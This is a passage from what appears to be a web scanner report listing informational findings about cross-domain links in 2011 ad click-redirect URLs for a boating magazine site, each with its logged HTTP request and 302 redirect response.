  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:14:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.168. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.169. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.170. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.171. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.172. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.173. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.174. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.175. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.176. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.177. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.178. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.179. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1286767660/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.180. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.181. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

